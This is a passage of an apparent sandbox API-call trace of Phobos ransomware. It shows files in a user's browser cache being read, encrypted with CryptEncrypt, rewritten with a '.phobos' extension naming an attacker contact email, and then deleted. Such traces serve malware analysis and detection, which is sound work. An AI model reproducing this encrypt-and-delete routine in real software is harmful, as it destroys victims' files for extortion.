files\\low\\content.ie5\\9qh4s0gz\\bbc095c[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0174.862] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0174.862] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.862] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x738, lpOverlapped=0x0) returned 1 [0174.873] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x740, dwBufLen=0x740 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x740) returned 1 [0174.873] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x740, lpOverlapped=0x0) returned 1 [0174.874] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0174.874] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.874] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0174.875] CryptDestroyKey (hKey=0xa32d28) returned 1 [0174.875] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0174.875] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0174.875] CloseHandle (hObject=0x148) returned 1 [0174.875] CloseHandle (hObject=0x178) returned 1 [0174.875] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc095c[1].jpg")) returned 1 [0174.876] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0174.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0alc[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0174.918] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6053) returned 1 [0174.918] CloseHandle (hObject=0x190) returned 1 [0174.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0alc[1].jpg")) returned 0x2020 [0174.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0alc[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0alc[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0174.918] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.918] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0174.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0alc[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.919] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0174.919] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0174.919] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x17a5, lpOverlapped=0x0) returned 1 [0175.024] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17b0, dwBufLen=0x17b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17b0) returned 1 [0175.024] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x17b0, lpOverlapped=0x0) returned 1 [0175.025] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0175.025] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.025] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0175.025] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0175.025] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0175.025] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.025] CloseHandle (hObject=0x190) returned 1 [0175.025] CloseHandle (hObject=0x158) returned 1 [0175.025] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0alc[1].jpg")) returned 1 [0175.033] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0175.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0mlu[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0175.036] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1314) returned 1 [0175.036] CloseHandle (hObject=0x178) returned 1 [0175.036] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0mlu[1].jpg")) returned 0x2020 [0175.036] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0mlu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0mlu[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0175.036] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.036] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0mlu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0175.037] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0175.037] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.037] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x522, lpOverlapped=0x0) returned 1 [0175.117] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x530, dwBufLen=0x530 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x530) returned 1 [0175.117] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x530, lpOverlapped=0x0) returned 1 [0175.118] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0175.118] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.118] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0175.118] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.118] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0175.118] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0175.118] CloseHandle (hObject=0x178) returned 1 [0175.118] CloseHandle (hObject=0x148) returned 1 [0175.118] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0mlu[1].jpg")) returned 1 [0175.119] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0175.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0175.120] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6287) returned 1 [0175.120] CloseHandle (hObject=0x148) returned 1 [0175.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[1].jpg")) returned 0x2020 [0175.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0175.120] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.120] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0175.121] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0175.121] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.121] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x188f, lpOverlapped=0x0) returned 1 [0175.128] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1890, dwBufLen=0x1890 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1890) returned 1 [0175.128] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1890, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1890, lpOverlapped=0x0) returned 1 [0175.129] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0175.129] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.129] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0175.129] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.129] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0175.129] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0175.129] CloseHandle (hObject=0x148) returned 1 [0175.129] CloseHandle (hObject=0x178) returned 1 [0175.129] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[1].jpg")) returned 1 [0175.130] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0175.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0tci[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0175.131] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=12813) returned 1 [0175.131] CloseHandle (hObject=0x178) returned 1 [0175.131] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0tci[1].jpg")) returned 0x2020 [0175.131] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0tci[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0tci[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0175.131] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.131] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0tci[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0175.132] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0175.132] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.132] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x320d, lpOverlapped=0x0) returned 1 [0175.173] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3210, dwBufLen=0x3210 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3210) returned 1 [0175.174] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3210, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3210, lpOverlapped=0x0) returned 1 [0175.175] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0175.175] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.175] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0175.175] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.175] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0175.175] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0175.175] CloseHandle (hObject=0x178) returned 1 [0175.175] CloseHandle (hObject=0x148) returned 1 [0175.175] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0tci[1].jpg")) returned 1 [0175.176] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0175.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdzozr[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, 